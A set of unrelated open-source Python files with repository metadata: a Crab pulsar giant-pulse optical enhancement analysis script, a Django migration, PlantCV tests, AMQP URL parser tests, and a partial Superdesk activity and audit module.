fineXdata = np.linspace(np.min(xdata),np.max(xdata),100.)
gaussfit = y_offset + amplitude * np.exp( - (( xdata - x_offset)**2) / ( 2. * (sigma**2)))
fineGaussFit = y_offset + amplitude * np.exp( - (( fineXdata - x_offset)**2) / ( 2. * (sigma**2)))
resolution = np.abs(x_offset/(2.355*sigma))
return {'gaussfit':gaussfit,'resolution':resolution,'sigma':sigma,'x_offset':x_offset,'amplitude':amplitude,'y_offset':y_offset,'fineXdata':fineXdata,'fineGaussFit':fineGaussFit,'parinfo':parinfo}
# common setup for matplotlib
params = {'savefig.dpi': 300, # save figures to 300 dpi
'axes.labelsize': 14,
'lines.linewidth': 1.5,
'text.fontsize': 14,
'legend.fontsize': 14,
'xtick.labelsize': 14,
'ytick.major.pad': 6,
'xtick.major.pad': 6,
'ytick.labelsize': 14}
# use of Sans Serif also in math mode
rc('text.latex', preamble='\usepackage{sfmath}')
rcParams.update(params)
phaseShift = 1.-0.677001953125#found with findOpticalPeak.py
def align_yaxis(ax1, v1, ax2, v2):
"""
adjust ax2 ylimit so that v2 in ax2 is aligned to v1 in ax1
Taken from http://stackoverflow.com/questions/10481990/matplotlib-axis-with-two-scales-shared-origin
"""
_, y1 = ax1.transData.transform((0, v1))
_, y2 = ax2.transData.transform((0, v2))
inv = ax2.transData.inverted()
_, dy = inv.transform((0, 0)) - inv.transform((0, y1-y2))
miny, maxy = ax2.get_ylim()
ax2.set_ylim(miny+dy, maxy+dy)
def indexToPhase(indices):
radioIndexOffset = 0.5#Guppi offset, found as shift in unrotated,rotated radio profiles
radioArrivalPhases = (indices+radioIndexOffset)/2048.+phaseShift
return radioArrivalPhases
def nSigma(pvalue):
return scipy.special.erfinv(pvalue)*np.sqrt(2.)
np.seterr(divide='ignore')
np.set_printoptions(threshold=np.nan)
path = '/Scratch/dataProcessing/crabData2/'
nIdxToCheck = 81
nSigmaRadioCutoff = 3
nBins = 250
bUseFineIndexBins = False
bInterpulses = False
#dataFilePath = path+'indPulseProfiles_{}sigma_{}_{}phaseBins_swap.h5'.format(nSigmaRadioCutoff,nIdxToCheck,nBins)
dataFilePath = path+'indPulseProfiles_{}sigma_P1_KS.h5'.format(nSigmaRadioCutoff)
dataFile = tables.openFile(dataFilePath,mode='r')
radioMax = dataFile.root.radioMax.read()
counts = dataFile.root.counts.read()#-dataFile.root.skyCounts.read()
giantPulseNumbers = dataFile.root.giantPulseNumbers.read()
pulseNumberTable = dataFile.root.pulseNumberTable.read()
giantPulseNumberMask = dataFile.root.giantPulseNumberMask.read()
idxOffsets = dataFile.root.idxOffsets.read()
indProfiles = dataFile.root.indProfiles.read()
radioIndices = dataFile.root.radioIndices.read()
overlapPNs = np.load('overlapP1.npz')['overlap']
mainPulseMask = np.logical_not(np.in1d(giantPulseNumbers,overlapPNs))
#mainPulseMask = np.logical_not(mainPulseMask)
radioMax = radioMax[mainPulseMask]
counts = counts[mainPulseMask]
giantPulseNumbers = giantPulseNumbers[mainPulseMask]
pulseNumberTable = pulseNumberTable[mainPulseMask]
giantPulseNumberMask = giantPulseNumberMask[mainPulseMask]
indProfiles = indProfiles[mainPulseMask]
radioIndices = radioIndices[mainPulseMask]
#radioIndexBins=np.array([1369,1371,1373,1375,1378,1381,1385,1389,1395])-.5
#radioIndexBinsFine = np.arange(1369,1396)-.5
radioIndexBins = np.arange(143,179,1)-.5
radioIndexBinsFine = np.arange(143,179)-.5
if bUseFineIndexBins == True:#For statistical test, use fine binning, for figure, use coarse
radioIndexBins = radioIndexBinsFine
startRadioIndex = radioIndexBins[0]
endRadioIndex = radioIndexBins[-1]
probDict = probsOfGRP(startPeakIndex=startRadioIndex,endPeakIndex=endRadioIndex)
probPhaseBins = probDict['radioPhaseBins']
probPeakDist = probDict['peakDist']
#a mask for less good data, during bright or dim times
dimMask = np.ones(len(counts))
idx0 = np.searchsorted(idxOffsets,0)
dimMask[counts[:,idx0]==0]=0
lineCounts = np.mean(counts,axis=1)
meanLineCounts = np.mean(lineCounts[lineCounts!=0])
stdLineCounts = np.std(lineCounts[lineCounts!=0])
stdPercentCutoff=0.
upperCutoff = scipy.stats.scoreatpercentile(lineCounts,100.-stdPercentCutoff)
lowerCutoff = scipy.stats.scoreatpercentile(lineCounts,stdPercentCutoff)
dimMask[lineCounts>upperCutoff] = 0
dimMask[lineCounts<lowerCutoff] = 0
dimMask = (dimMask==1)
radioStrength = radioMax
indProfilesMask = np.tile(giantPulseNumberMask,(np.shape(indProfiles)[2],1,1))
indProfilesMask = np.swapaxes(indProfilesMask,0,2)
indProfilesMask = np.swapaxes(indProfilesMask,0,1)
indProfilesMasked = np.ma.array(indProfiles,mask=indProfilesMask)
nIdxOffsets = len(idxOffsets)
#sum over GRP index, to get number of nonzero pulses in each index
# this will be used to scale later
nPulsesPerIdx = np.array(np.sum(giantPulseNumberMask,axis=0),dtype=np.double).reshape((-1,1))
cmap = matplotlib.cm.jet
histStart = 0.
histEnd = 1.
nBins=np.shape(indProfiles)[2]
_,phaseBinEdges = np.histogram(np.array([0]),range=(histStart,histEnd),bins=nBins)
phaseBinEdges+=phaseShift
phaseBinCenters = phaseBinEdges[0:-1]+np.diff(phaseBinEdges)/2.
grpProfile = np.ma.mean(indProfilesMasked.data[:,idx0],axis=0)
peakIdx = np.argmax(grpProfile)
peakBins = range(peakIdx-1,peakIdx+2)
print 'opticalPeakPhaseBins',peakBins
nRadioBins=15
radioStrengthCutoff = .155#0.155
radioCutoffMask = radioStrength >= radioStrengthCutoff
strongMask = np.logical_and(radioCutoffMask,dimMask)
#finalMask = np.logical_and(strongMask,radioPeakMask)
radioPhaseMask = np.logical_and(radioIndices >= 143,radioIndices <= 178)
#radioPhaseMask = np.logical_and(radioIndices >= np.min(radioIndices),radioIndices <= np.max(radioIndices))
finalMask = np.logical_and(strongMask,radioPhaseMask)
print 'GRP above',radioStrengthCutoff,':',np.sum(finalMask),'and in phase range'
#counts color plot
fig = plt.figure()
ax = fig.add_subplot(111)
handleMatshow = ax.matshow(counts[finalMask])
ax.set_aspect(1.0*np.shape(counts[finalMask])[1]/np.shape(counts[finalMask])[0])
fig.colorbar(handleMatshow)
overallCoincidentProfile = np.mean(indProfiles[finalMask,idx0,:],axis=0)
surroundingProfiles = np.ma.mean(indProfilesMasked[finalMask,:],axis=0)
avgProfile = np.ma.mean(surroundingProfiles,axis=0)
minProfileIndex = np.argmin(avgProfile)
#for the sky level take an average over 5 points at the lowest part of the period
skyLevel = np.mean(avgProfile[minProfileIndex-3:minProfileIndex+3])
avgProfileErrors = np.ma.std(surroundingProfiles,axis=0)/np.sqrt(nIdxOffsets)#std over iIdxOffset /sqrt(N) to get error in avgProfile
#add errors in quadrature
skySigma = np.sqrt(np.sum(avgProfileErrors[minProfileIndex-3:minProfileIndex+3]**2.))
#should check error in sky level at some point
print 'sky level',skyLevel,'+/-',skySigma
overallCoincidentProfile-=skyLevel
surroundingProfiles-=skyLevel
avgProfile-=skyLevel
indProfiles-=skyLevel
avgOverallProfile = avgProfile
stdProfile = np.ma.std(surroundingProfiles,axis=0)#std over iIdxOffset
stdProfile = np.sqrt(stdProfile**2+skySigma**2)
avgStdProfile = stdProfile/np.sqrt(nIdxOffsets-1)
giantPeakHeight = np.sum(overallCoincidentProfile[peakBins])
peakHeight = np.sum(avgProfile[peakBins])
peakSigma = np.sqrt(np.sum(stdProfile[peakBins]**2))
overallEnhancement = (giantPeakHeight-peakHeight)/peakHeight
enhancementNSigma = (giantPeakHeight-peakHeight)/peakSigma
enhancementError = peakSigma/peakHeight
overallEnhancementError = enhancementError
print 'peak enhancement of avg above',radioStrengthCutoff,':',overallEnhancement,'+/-',enhancementError,'(',enhancementNSigma,' sigma)'
overallPeakHeight = np.array(peakHeight)
allProfiles = np.array(surroundingProfiles.data)
allProfiles[idx0]=overallCoincidentProfile#add back in since it was masked and zeroed earlier
allPeakHeights = np.sum(allProfiles[:,peakBins],axis=1)
peakPercentDifferenceByIdxOffset = (allPeakHeights-peakHeight)/peakHeight
nSigmaByIdxOffset = (allPeakHeights-peakHeight)/peakSigma
#significance figure
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(idxOffsets,np.abs(nSigmaByIdxOffset),'k')
ax.set_ylabel('Standard Deviations of Peak Height from Average Peak')
ax.set_xlabel('Pulse Offset Relative to GRP (number of periods)')
ax.set_ylim((0,4.5))
np.savez('sigP1.npz',idxOffsets=idxOffsets,nSigmaByIdxOffset=nSigmaByIdxOffset)
giantPeakHeights = np.sum(indProfiles[:,idx0,peakBins][finalMask],axis=1)
peakHeights = np.sum(indProfiles[:,:,peakBins][finalMask],axis=2)
#index peakHeights[iGRP,iIdxOffset]
maskedPeakHeights = np.ma.array(peakHeights,mask=giantPulseNumberMask[finalMask])
avgPeakHeights = np.ma.mean(maskedPeakHeights,axis=1)#average over iIdxOffset i.e. average of surrounding pulses for each iGRP
opticalEnhancementGRP = (giantPeakHeights-avgPeakHeights)/avgPeakHeights
opticalEnhancement = (avgPeakHeights-overallPeakHeight)/overallPeakHeight
radioProfile = np.loadtxt(path+'radio/RadioProfile_LyneDM_TZRCorrect_withGUPPIdelay.txt',skiprows=1,usecols=[3])
nRadioPhaseBins = len(radioProfile)
radioProfilePhaseBins = (1.*np.arange(nRadioPhaseBins)+.5)/nRadioPhaseBins
radioProfilePhaseBins+=phaseShift
fig = plt.figure()
ax = fig.add_subplot(111)
ax2 = ax.twinx()
pltHandle2 = ax2.plot(radioProfilePhaseBins,radioProfile,c=(.4,.5,.8),label='Radio Pulse')
pltHandle0 = ax.errorbar(phaseBinCenters,overallCoincidentProfile,yerr=stdProfile,c='k',label='Optical GRP-coincident Pulse')
pltHandle1 = ax.plot(phaseBinCenters,avgProfile,c='r',label='Optical non-GRP-coincident Pulse')
pltHandles = [pltHandle0,pltHandle1[0],pltHandle2[0]]
pltLabels = [pltHandle.get_label() for pltHandle in pltHandles]
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax2.set_position([box.x0, box.y0 + box.height * 0.15,
box.width, box.height * 0.85])
ax.set_ylim((0.055,.081))
ax2.set_ylim((.11,.155))
ax.set_xlim((0.97,1.005))
locator = matplotlib.ticker.MultipleLocator(.01)
ax2.yaxis.set_major_locator(locator)
ax.legend(pltHandles,pltLabels,loc='upper center', bbox_to_anchor=(0.5, -0.1),
fancybox=True, shadow=True, ncol=2)
ax.set_ylabel('Optical Counts per Period per Pixel')
ax.set_xlabel('Phase')
ax2.set_ylabel('Normalized Radio Intensity')
#enhanced profile figure
#fig = plt.figure(figsize=(1.8,2))
ax = fig.add_subplot(2,2,1)
#ax = fig.add_axes([0.,.6,.4,.4])
doublePhaseBins = np.concatenate([phaseBinCenters-1,phaseBinCenters,1+phaseBinCenters])
doubleOverallCoincidentProfile = np.concatenate([overallCoincidentProfile,overallCoincidentProfile,overallCoincidentProfile])
doubleStdProfile = np.concatenate([stdProfile,stdProfile,stdProfile])
doubleAvgProfile = np.concatenate([avgProfile,avgProfile,avgProfile])
doubleRadioProfilePhaseBins = np.concatenate([radioProfilePhaseBins-1,radioProfilePhaseBins,1+radioProfilePhaseBins])
doubleRadioProfile = np.concatenate([radioProfile,radioProfile,radioProfile])
ax2 = ax.twinx()
pltHandle2 = ax2.plot(doubleRadioProfilePhaseBins,doubleRadioProfile,c=(.4,.5,.8),label='Radio Pulse')
pltHandle0 = ax.plot(doublePhaseBins,doubleOverallCoincidentProfile,c='k',label='Optical GRP-coincident Pulse')
pltHandle1 = ax.plot(doublePhaseBins,doubleAvgProfile,c='r',label='Optical non-GRP-coincident Pulse')
pltHandles = [pltHandle0[0],pltHandle1[0],pltHandle2[0]]
pltLabels = [pltHandle.get_label() for pltHandle in pltHandles]
#rect = plt.Rectangle((.970,0.055),1.005-.970,.081-0.055,edgecolor='green',fill=True,linewidth=2.)
#ax.add_patch(rect)
ax.yaxis.set_visible(False)
ax2.yaxis.set_visible(False)
ax.set_ylim((-.005,.081))
ax2.set_ylim((-.01,.155))
ax.set_xlim((0.01,1.99))
ax.set_xlabel('Phase')
#ax.xaxis.label.set_size(14)
#ax.tick_params(axis='both', which='major', labelsize=12)
#ax2.tick_params(axis='both', which='major', labelsize=12)
box = ax.get_position()
ax.set_position([box.x0, box.y0 + box.height * 0.3,
box.width*.8, box.height * 0.7])
ax2.set_position([box.x0, box.y0 + box.height * 0.3,
box.width*.8, box.height * 0.7])
radioProfile = radioProfile*np.max(overallCoincidentProfile)/np.max(radioProfile)
#Now plot optical enhancement vs radio arrival time
radioPhases = indexToPhase(radioIndices)
radioPhaseBins = indexToPhase(radioIndexBins)
radioPhaseBinCenters = radioPhaseBins[0:-1]+np.diff(radioPhaseBins)/2.
print 'radioIndexBins',radioIndexBins,np.diff(radioIndexBins)
print 'radioPhaseBinEdges',radioPhaseBins,np.diff(radioPhaseBins)
radioBinned = np.digitize(radioPhases,bins=radioPhaseBins)
enhancements = []
enhancementNSigmas = []
enhancementNSigmasOverOverall = []
enhancementErrors = []
globalEnhancements = []
globalEnhancementErrors = []
#non-GRP pulse enhancements
profiles = []
radioStrengthCutoff = .155#0.155
radioCutoffMask = radioStrength >= radioStrengthCutoff
strongMask = np.logical_and(radioCutoffMask,dimMask)
strongMask = np.logical_and(strongMask,radioPhaseMask)
for iBin,bin in enumerate(radioPhaseBins[0:-1]):
binMask = np.logical_and(radioBinned==(iBin+1),strongMask)
binProfile = np.mean(indProfiles[binMask,idx0,:],axis=0)
profiles.append(binProfile)
phasesInBin = radioPhases[binMask]
surroundingProfiles = np.ma.mean(indProfilesMasked[binMask,:],axis=0)
avgProfile = np.ma.mean(surroundingProfiles,axis=0)
stdProfile = np.ma.std(surroundingProfiles,axis=0)#std over iIdxOffset
nSurroundingProfiles=np.sum(np.logical_not(surroundingProfiles.mask),axis=0)
errorAvgProfile = np.divide(stdProfile,np.sqrt(nSurroundingProfiles))
giantPeakHeight = np.sum(binProfile[peakBins])
peakHeight = np.sum(avgProfile[peakBins])
peakSigma = np.sqrt(np.sum(stdProfile[peakBins]**2))
enhancement = (giantPeakHeight-peakHeight)/peakHeight
enhancementNSigma = (giantPeakHeight-peakHeight)/peakSigma
enhancementError = peakSigma/peakHeight
enhancements.append(enhancement)
enhancementNSigmas.append(enhancementNSigma)
enhancementErrors.append(enhancementError)
nSigmaOverOverall=(enhancement-overallEnhancement)/enhancementError
enhancementNSigmasOverOverall.append(nSigmaOverOverall)
#print '{:.3}+/-{:.3}({:.3},{:.3})'.format(enhancement,enhancementError,enhancementNSigma,(enhancement-overallEnhancement)/enhancementError)
print '{}\t{:.5}\t{}\t{:.3}\t{:.3}\t{:.3}'.format(radioIndexBins[iBin],bin,np.sum(binMask),enhancement,enhancementError,nSigmaOverOverall)
globalEnhancement = (giantPeakHeight-overallPeakHeight)/overallPeakHeight
globalEnhancementError = peakSigma/overallPeakHeight
globalEnhancements.append(globalEnhancement)
globalEnhancementErrors.append(globalEnhancementError)
nonGRPEnhancement = (peakHeight-overallPeakHeight)/overallPeakHeight
nonGRPPeakSigma = np.sqrt(np.sum(errorAvgProfile[peakBins])**2)
nonGRPEnhancementNSigma = (peakHeight-overallPeakHeight)/nonGRPPeakSigma
nonGRPEnhancementError = nonGRPPeakSigma/overallPeakHeight
#print 'nonGRP {:.3}+/-{:.3}({:.3})'.format(nonGRPEnhancement,nonGRPEnhancementError,nonGRPEnhancementNSigma)
nextBin = radioPhaseBins[iBin+1]
#ax.plot(phaseBinEdges[0:-1],binProfile-avgProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
#ax2.errorbar(phaseBinEdges[0:-1],binProfile,yerr=stdProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
#ax3.errorbar(phaseBinEdges[0:-1],avgProfile,yerr=errorAvgProfile,c=color,label='{:.3}-{:.3}'.format(bin,nextBin))
enhancements = np.array(enhancements)
enhancementErrors = np.array(enhancementErrors)
percentEnhancements = 100.*enhancements
percentEnhancementErrors = 100.*enhancementErrors
fig = plt.figure(figsize=(8.,6.))
#ax = fig.add_subplot(211)
ax = fig.add_axes([.15,.6,.8,.3])
#ax.step(radioIndexBins[0:-1],noiseDist,'g',label='noise detections')
ax.plot(probPhaseBins,np.append(probPeakDist,probPeakDist[-1]),'k',drawstyle='steps-post',label='GRP+noise detections')
ax.set_ylabel('Number of\nGRPs detected')
ax.xaxis.set_visible(False)
ax.xaxis.set_ticks([])
#ax.step(radioIndexBins[0:-1],peakDist,'k',label='GRP+noise detections')
#fig = plt.figure()
#ax = fig.add_subplot(212)
ax2 = fig.add_axes([.15,.1,.8,.5])
#ax.errorbar(radioPhaseBinCenters,100.*enhancements,yerr=100.*enhancementErrors,marker='.',color='k',label='enhancement relative to surrounding nonGRP',linestyle='.')
ax2.errorbar(radioPhaseBinCenters,percentEnhancements,yerr=percentEnhancementErrors,linestyle='.',color='k')
ax2.plot(radioPhaseBins,np.append(percentEnhancements,percentEnhancements[-1]),'k',drawstyle='steps-post',label='enhancement relative to surrounding nonGRP')
opticalPeakPhase = 0.993998046875
ax2.axhline(0.,linewidth=1.,c='k')
ax2.axvline(opticalPeakPhase,c='gray',linestyle='--')
ax2.set_xlabel('GRP Arrival Phase')
ax2.set_ylabel('Optical Enhancement of\nGRP-Coincident Pulses (%)')
ax2.set_xlim((.392,.411))
ax.set_xlim((.392,.411))
fig.text(.175,.85,'(a)',size=16)
ax2.yaxis.get_major_ticks()[-1].label1.set_visible(False)
fig.text(.175,.55,'(b)',size=16)
#ax2.legend(loc='lower left')
fig = plt.figure()
ax = fig.add_subplot(111)
#ax.errorbar(radioPhaseBinCenters,100.*enhancements,yerr=100.*enhancementErrors,marker='.',color='k',label='enhancement relative to surrounding nonGRP',linestyle='.')
ax.errorbar(radioPhaseBinCenters,percentEnhancements,yerr=percentEnhancementErrors,linestyle='.',color='k')
ax.plot(radioPhaseBins,np.append(percentEnhancements,percentEnhancements[-1]),'k',drawstyle='steps-post',label='enhancement relative to surrounding nonGRP')
radioPhaseBinWidths = np.diff(radioPhaseBins)
meanPercentEnhancement = np.average(percentEnhancements,weights = 1/percentEnhancementErrors**2)
errorMeanPercentEnhancement = 1./np.sqrt(np.sum(1/percentEnhancementErrors**2))
print 'weighted average enhancement (%):',meanPercentEnhancement,'+/-',errorMeanPercentEnhancement
chi2=np.sum((percentEnhancements-meanPercentEnhancement)**2/percentEnhancementErrors**2)
dof=len(percentEnhancements)-1 #free parameter: meanEnhancement
pvalue=1-scipy.stats.chi2.cdf(chi2,dof)
print 'flat line: chi2 dof pvalue significance',chi2,dof,pvalue,nSigma(1-pvalue),'sigmas'
gaussDict = fitGauss(xdata=radioPhaseBinCenters,ydata=percentEnhancements,yerr=percentEnhancementErrors)
fit = gaussDict['gaussfit']
ax.plot(radioPhaseBinCenters,fit)
ax.plot(gaussDict['fineXdata'],gaussDict['fineGaussFit'])
chi2Fit=np.sum((percentEnhancements-fit)**2/percentEnhancementErrors**2)
dofFit=len(percentEnhancements)-4 #free parameters:y_offset,x_offset,amplitude,sigma
pvalueFit=1-scipy.stats.chi2.cdf(chi2Fit,dofFit)
print 'gaussian: chi2 dof pvalue significance',chi2Fit,dofFit,pvalueFit,nSigma(1-pvalueFit),'sigmas'
print gaussDict['parinfo']
flatLineDict = fitGauss(xdata=radioPhaseBinCenters,ydata=percentEnhancements,yerr=percentEnhancementErrors,flatLine=True)
fit = flatLineDict['gaussfit']
ax.plot(radioPhaseBinCenters,fit)
ax.plot(flatLineDict['fineXdata'],flatLineDict['fineGaussFit'])
chi2=np.sum((percentEnhancements-fit)**2/percentEnhancementErrors**2)
dof=len(percentEnhancements)-1 #free parameters:y_offset
pvalue=1-scipy.stats.chi2.cdf(chi2,dof)
print 'flatLine: chi2 dof pvalue significance',chi2,dof,pvalue,nSigma(1-pvalue),'sigmas'
print flatLineDict['parinfo']
chi2Diff = chi2-chi2Fit
dofDiff = dof-dofFit
pvalueDiff=1-scipy.stats.chi2.cdf(chi2Diff,dofDiff)
print 'diff: chi2 dof pvalue significance',chi2Diff,dofDiff,pvalueDiff,nSigma(1-pvalueDiff),'sigmas'
plt.show()
|
bmazin/ARCONS-pipeline
|
examples/Pal2012-crab/enhancementPhaseP1.py
|
Python
|
gpl-2.0
| 21,133 | 0.022903 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('main', '0019_auto_20170521_1332'),
]
operations = [
migrations.CreateModel(
name='RecentActivity',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('timestamp', models.DateTimeField()),
('type', models.CharField(max_length=255, choices=[(b'follow', b'Followers/Subscribers'), (b'support', b'Recurring Support')])),
('data', models.TextField()),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
),
]
|
google/mirandum
|
alerts/main/migrations/0020_recentactivity.py
|
Python
|
apache-2.0
| 895 | 0.002235 |
import pytest
import cv2
from plantcv.plantcv.visualize import auto_threshold_methods
def test_auto_threshold_methods_bad_input(visualize_test_data):
"""Test for PlantCV."""
img = cv2.imread(visualize_test_data.small_rgb_img)
with pytest.raises(RuntimeError):
_ = auto_threshold_methods(gray_img=img)
def test_auto_threshold_methods(visualize_test_data):
"""Test for PlantCV."""
img = cv2.imread(visualize_test_data.small_gray_img, -1)
labeled_imgs = auto_threshold_methods(gray_img=img)
assert len(labeled_imgs) == 5
|
danforthcenter/plantcv
|
tests/plantcv/visualize/test_auto_threshold_methods.py
|
Python
|
mit
| 558 | 0 |
# Copyright (c) 2014 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (GPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of GPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
from unittest import TestCase
from gofer.messaging.adapter.url import URL
from gofer.messaging.adapter.url import PORT, Scheme
class Test(object):
def __init__(self,
url,
adapter=None,
scheme=None,
host=None,
port=None,
userid=None,
password=None,
path=None):
self.url = url
self.adapter = adapter
self.scheme = scheme
self.host = host
self.port = port
self.userid = userid
self.password = password
self.path = path
def __call__(self, test):
url = URL(self.url)
test.assertEqual(url.adapter, self.adapter)
test.assertEqual(url.scheme, self.scheme)
test.assertEqual(url.host, self.host)
test.assertEqual(url.port, self.port)
test.assertEqual(url.userid, self.userid)
test.assertEqual(url.password, self.password)
test.assertEqual(url.path, self.path)
TESTS = [
Test('qpid+amqp://elmer:fudd@blue:5000/all',
adapter='qpid',
scheme='amqp',
host='blue',
port=5000,
userid='elmer',
password='fudd',
path='all'),
Test('amqp://elmer:fudd@yellow:1234//',
scheme='amqp',
host='yellow',
port=1234,
userid='elmer',
password='fudd',
path='/'),
Test('amqp://green:5678/all/good',
scheme='amqp',
host='green',
port=5678,
path='all/good'),
Test('amqp://red:2323',
scheme='amqp',
host='red',
port=2323),
Test('amqp://black',
scheme='amqp',
host='black',
port=5672),
Test('amqps://purple',
scheme='amqps',
host='purple',
port=5671),
Test('orange:6545',
scheme='amqp',
host='orange',
port=6545),
Test('localhost',
scheme='amqp',
host='localhost',
port=5672),
Test('',
scheme='amqp',
port=5672),
]
class TestURL(TestCase):
def test_parsing(self):
for test in TESTS:
test(self)
def test_canonical(self):
urls = [
'qpid+amqp://elmer:fudd@test-host:5000/all',
'amqp://elmer:fudd@test-host:5000/all',
'amqp://test-host:5000/all',
'amqp://test-host:5000'
]
for _url in urls:
url = URL(_url)
self.assertEqual(url.canonical, _url.split('+')[-1].rsplit('/all')[0])
def test_is_ssl(self):
# false
url = URL('amqp://localhost')
self.assertFalse(url.is_ssl())
# true
url = URL('amqps://localhost')
self.assertTrue(url.is_ssl())
def test_hash(self):
url = URL('test')
self.assertEqual(hash(url), hash(url.canonical))
def test_str(self):
urls = [
'qpid+amqp://elmer:fudd@test-host:5000/all',
'amqp://elmer:fudd@test-host:5000/all',
'amqp://test-host:5000/all',
'amqp://test-host:5000',
'amqp://test-host',
]
for _url in urls:
url = URL(_url)
self.assertEqual(str(url), url.canonical)
class TestScheme(TestCase):
def test_validated(self):
for n in PORT:
self.assertEqual(Scheme.validated(n), n.lower())
self.assertRaises(ValueError, Scheme.validated, 'unsupported')
|
jortel/gofer
|
test/unit/messaging/adapter/test_url.py
|
Python
|
lgpl-2.1
| 4,053 | 0.000247 |
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
import datetime
import logging
from bson.objectid import ObjectId
from flask import g
import superdesk
from superdesk import get_resource_service
from superdesk.emails import send_activity_emails
from superdesk.errors import SuperdeskApiError, add_notifier
from superdesk.notification import push_notification
from superdesk.resource import Resource
from superdesk.services import BaseService
from superdesk.utc import utcnow
log = logging.getLogger(__name__)
def init_app(app):
endpoint_name = 'activity'
service = ActivityService(endpoint_name, backend=superdesk.get_backend())
ActivityResource(endpoint_name, app=app, service=service)
endpoint_name = 'audit'
service = AuditService(endpoint_name, backend=superdesk.get_backend())
AuditResource(endpoint_name, app=app, service=service)
app.on_inserted += service.on_generic_inserted
app.on_updated += service.on_generic_updated
app.on_deleted_item += service.on_generic_deleted
# Registering with intrinsic privileges because: A user should be able to mark as read their own notifications.
superdesk.intrinsic_privilege(resource_name='activity', method=['PATCH'])
class AuditResource(Resource):
endpoint_name = 'audit'
resource_methods = ['GET']
item_methods = ['GET']
schema = {
'resource': {'type': 'string'},
'action': {'type': 'string'},
'extra': {'type': 'dict'},
'user': Resource.rel('users', False)
}
exclude = {endpoint_name, 'activity', 'dictionaries', 'macros'}
class AuditService(BaseService):
def on_generic_inserted(self, resource, docs):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
if not len(docs):
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'created',
'extra': docs[0]
}
self.post([audit])
def on_generic_updated(self, resource, doc, original):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'updated',
'extra': doc
}
self.post([audit])
def on_generic_deleted(self, resource, doc):
if resource in AuditResource.exclude:
return
user = getattr(g, 'user', None)
if not user:
return
audit = {
'user': user.get('_id'),
'resource': resource,
'action': 'deleted',
'extra': doc
}
self.post([audit])
class ActivityResource(Resource):
endpoint_name = 'activity'
resource_methods = ['GET']
item_methods = ['GET', 'PATCH']
schema = {
'name': {'type': 'string'},
'message': {'type': 'string'},
'data': {'type': 'dict'},
'recipients': {
'type': 'list',
'schema': {
'type': 'dict',
'schema': {
'user_id': Resource.rel('users'),
'read': {'type': 'boolean', 'default': False},
'desk_id': Resource.rel('desks')
}
}
},
'item': Resource.rel('archive', type='string'),
'user': Resource.rel('users'),
'desk': Resource.rel('desks'),
'resource': {'type': 'string'}
}
exclude = {endpoint_name, 'notification'}
datasource = {
'default_sort': [('_created', -1)],
'filter': {'_created': {'$gte': utcnow() - datetime.timedelta(days=1)}}
}
superdesk.register_default_user_preference('email:notification', {
'type': 'bool',
'enabled': True,
'default': True,
'label': 'Send notifications via email',
'category': 'notifications',
})
class ActivityService(BaseService):
def on_update(self, updates, original):
""" Called on the patch request to mark a activity/notification/comment as having been read and
nothing else
:param updates:
:param original:
:return:
"""
user = getattr(g, 'user', None)
if not user:
raise SuperdeskApiError.notFoundError('Can not determine user')
user_id = user.get('_id')
# make sure that the user making the read notification is in the notification list
if not self.is_recipient(updates, user_id):
raise SuperdeskApiError.forbiddenError('User is not in the notification list')
# make sure the transition is from not read to read
if not self.is_read(updates, user_id) and self.is_read(original, user_id):
raise SuperdeskApiError.forbiddenError('Can not set notification as read')
# make sure that no other users are being marked as read
for recipient in updates.get('recipients', []):
if recipient['user_id'] != user_id:
if self.is_read(updates, recipient['user_id']) != self.is_read(original, recipient['user_id']):
raise SuperdeskApiError.forbiddenError('Can not set other users notification as read')
# make sure that no other fields are being up dated just read and _updated
if len(updates) != 2:
raise SuperdeskApiError.forbiddenError('Can not update')
def is_recipient(self, activity, user_id):
"""
Checks if the given user is in the list of recipients
"""
return any(r for r in activity.get('recipients', []) if r['user_id'] == user_id)
def is_read(self, activity, user_id):
"""
Returns the read value for the given user
"""
return next((r['read'] for r in activity.get('recipients', []) if r['user_id'] == user_id), False)
ACTIVITY_CREATE = 'create'
ACTIVITY_UPDATE = 'update'
ACTIVITY_DELETE = 'delete'
ACTIVITY_EVENT = 'event'
ACTIVITY_ERROR = 'error'
def add_activity(activity_name, msg, resource=None, item=None, notify=None, notify_desks=None,
can_push_notification=True, **data):
"""
Adds an activity into activity log.
This will became part of current user activity log.
If there is someone set to be notified it will make it into his notifications box.
:param activity_name: Name of the activity
:type activity_name: str
:param msg: Message to be recorded in the activity log
:type msg: str
:param resource: resource name generating this activity
:type resource: str
:param item: article instance, if the activity is being recorded against an article, default None
:type item: dict
:param notify: user identifiers against whom the activity should be recorded, default None
:type notify: list
:param notify_desks: desk identifiers if someone mentions Desk Name in comments widget, default None
:type notify_desks: list
:param can_push_notification: flag indicating if a notification should be pushed via WebSocket, default True
:type can_push_notification: bool
:param data: kwargs
:type data: dict
:return: activity object
:rtype: dict
"""
activity = {
'name': activity_name,
'message': msg,
'data': data,
'resource': resource
}
name = ActivityResource.endpoint_name
user = getattr(g, 'user', None)
if user:
activity['user'] = user.get('_id')
activity['recipients'] = []
